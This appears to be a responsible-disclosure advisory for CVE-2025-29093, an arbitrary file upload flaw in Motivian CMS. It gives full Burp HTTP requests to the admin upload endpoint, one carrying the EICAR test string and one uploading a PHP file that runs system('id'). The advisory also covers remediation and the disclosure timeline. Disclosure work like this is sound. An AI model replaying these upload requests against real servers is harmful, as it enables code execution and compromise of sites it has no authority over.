# CVE-2025-29093-Arbitrary-File-Upload
This repository reveals a security vulnerability discovered in **Motivian Content Management System v.41.0.0**.

- CVE-2025-29093: Arbitrary File Upload

This vulnerability was reported to the vendor in accordance with responsible disclosure practices, and to MITRE, which assigned a temporary CVE ID. The details are being made public following the expiration of the 45-day disclosure period.


## General Information

- **Title:** Motivian Arbitrary File Upload
- **Vulnerability Type:** Arbitrary File Upload
- **Vendor of Product:** Motivian
- **Product:** Motivian Content Management System
- **Affected Version:** Motivian CMS v.41.0.0
- **Affected Component:** `Content/Gallery/Images`
- **Attack Vector:** Remote
- **Impact:** Malicious arbitrary file upload
- **Severity:** Medium
- **CVSSv3 score:** 6.5
- **CVSSv3 vector:** CVSS:3.1:AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
- **Severity by CISA-ADP:** High
- **CVSSv3 score by CISA-ADP:** 8.2
- **CVSSv3 vector by CISA-ADP:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
- **Found:** 2025-02-03
- **By:** Francesco Marcuccio
- **Status:** Reported to vendor on April 7, 2025 - No response/fix received by May 22, 2025


### Description

File Upload vulnerability in Motivian Content Managment System v.41.0.0 allows a remote attacker to upload arbitrary files with crafted extensions (e.g. `.php`, `.png`, `.txt`) containing malicious code, via the `Content/Gallery/Images` component.


### Proof Of Concept

The vulnerability can be exploited by uploading files with various extensions. For demonstration purposes, two proof-of-concept cases were used: one involving a `.php` file containing malicious code, and another using a `.txt` file with the *EICAR* test string. Both files were uploaded via the `Content/Gallery/Images` component.

Below is the full transcript of the HTTP requests and responses used to demonstrate the issue:


#### _Burp Request EICAR_

```http title:BurpRequestEICAR 
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"

-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"

M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--
```

#### _Burp Request PHP_

```http title:BurpRequestPHP
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"

304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"

77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream

<?php 
echo system('id'); 
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--
```

#### _Burp Response_
```http title:BurpResponse 
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729
```

### Remediation

Do not allow users to upload arbitrary files. Implement strict file validation (MIME type and content inspection), randomize filenames, and restrict upload directories.


## Disclosure Timeline

| Date       | Action                                |
| ---------- | ------------------------------------- |
| 2025-02-06 | CVE ID request (CNA: MITRE)           |
| 2025-04-02 | CVE ID assignment                     |
| 2025-04-07 | Vulnerabilities reported to vendor    |
| 2025-05-31 | Public disclosure after expiration of the 45-day disclosure period (54 days total) |
| 2025-06-04 | Official registration and entry in the MITRE database and NIST/NVD portal |

## Credit
- Discovered and responsibly disclosed by:  
[**Francesco Marcuccio**](https://www.linkedin.com/in/francesco-marcuccio-0433b9218)  
CyberSecurity Consultant, Penetration Tester

- MITRE discoverer attribution listed as:  
[**Francesco Marcuccio**](https://www.linkedin.com/in/francesco-marcuccio-0433b9218)  
CyberSecurity Consultant, Penetration Tester

## Links
Reference links: [**MITRE**](https://www.cve.org/CVERecord?id=CVE-2025-29093)  [**NIST**](https://nvd.nist.gov/vuln/detail/CVE-2025-29093) 


## Status
This CVE ID is officially in PUBLISHED status. It will be updated with CVSS score by NIST, after analysis.
